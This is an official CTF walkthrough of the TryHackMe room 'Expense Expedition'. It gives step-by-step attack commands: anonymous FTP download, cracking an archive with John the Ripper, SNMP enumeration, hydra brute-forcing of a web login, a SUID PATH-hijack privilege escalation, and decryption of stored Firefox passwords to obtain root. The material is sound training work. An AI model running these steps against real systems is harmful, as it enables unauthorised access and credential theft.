Expense Expedition Official Writeup (TryHackMe)
This is the official write-up of the Expense Expedition CTF room on TryHackMe.
Enumeration
Using Rustscan to scan the TCP Ports:-
rustscan -a [IP] -- -A
FTP Enumeration
From our Rustscan result, we found out that FTP has anonymous login enabled!
- First, let’s turn off the passive mode!
- Then, list the files in the FTP server.
- We see a cs.rar file, let’s download it to our machine.
ftp anonymous@[IP]
ftp> passive
ftp> ls
ftp> get cs.rar
Let’s extract the contents of the RAR file
Let’s brute force for the password with John the Ripper
rar2john cs.rar > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Extracting the rar file, we get a cs.txt file. Let’s read it!
unrar x cs.rar
cat cs.txt
SNMP Enumeration
If you knew about the SNMP Protocol, you would’ve quickly got the hint! The “SNMP community string” is like a user ID or password that allows access to a router’s or other device’s statistics. SNMP community strings are used only by devices that support the SNMPv1 and SNMPv2c protocol.
First let’s confirm whether the SNMP port is enabled or not:-
nmap [IP] -sU -p 161 -Pn -T5
Let’s enumerate SNMP. I will use the tool snmp-check :-
snmp-check [IP] -c somaiya
We find out some important details:-
- Hostname: somaiya
- Username: dhruv
So there’s a user “dhruv” on the system, but we still don’t have it’s password yet!
HTTP Enumeration
We need to fuzz for the subdirectories. I’ll be using ffuf for this
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u http://192.168.1.100/FUZZ -ic -c
We find an uncommon expense directory. Visiting the directory, we find an expense-tracking website. Moving down the page, we find another user “aaryan”.
Now we have 2 users:-
- aaryan
- dhruv
Let’s brute force both the usernames for their passwords. Clicking on the login section above, we find the login page too.
Using hydra to brute force the password:-
hydra [IP] http-post-form -l dhruv -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt "/expense/login2.php:username=^USER^&password=^PASS^&login=Login:F=Username/Password Incorrect" -F -t 40
Although we couldn’t brute force aaryan’s password, we found the password for dhruv! Logging in just provides us with a dashboard page with expense and report categories, nothing fishy! Let’s use these credentials for logging into the system using SSH!
Gaining Access
ssh dhruv@[IP]
cat user.txt
Privilege Escalation
Horizontal Privilege Escalation
Let’s enumerate for SUID binaries
When we run this command, it pings to the localhost. Let’s run strings on this command to find out what it does internally!
strings /opt/path
Found the Vulnerability! The ping path is relative, not absolute. We can abuse the PATH variable to perform privilege escalation!
export PATH=/tmp:$PATH
echo "/bin/sh" > /tmp/ping
chmod 777 /tmp/ping
/opt/path
Awesome, we have successfully changed the userID (uid)! Although we aren’t the root user, we can enumerate “aaryan” user for vertical privilege escalation!
Vertical Privilege Escalation
When we move to the home directory of the “aaryan” user, we find a hidden .mozilla directory. This directory contains stored Firefox passwords!
- Copy the entire directory onto our machine
- We will use a tool called firefox_decrypt to decrypt the passwords
- Usage:-
mv .mozilla/ mozilla/
python firefox_decrypt.py mozilla/
Congrats, we found the root password!
su root
cat /root/root.txt
And that is the entire machine pwned! Hope you enjoyed solving this CTF, it’s my first and one of many to come! Until then, auf wiedersehen!
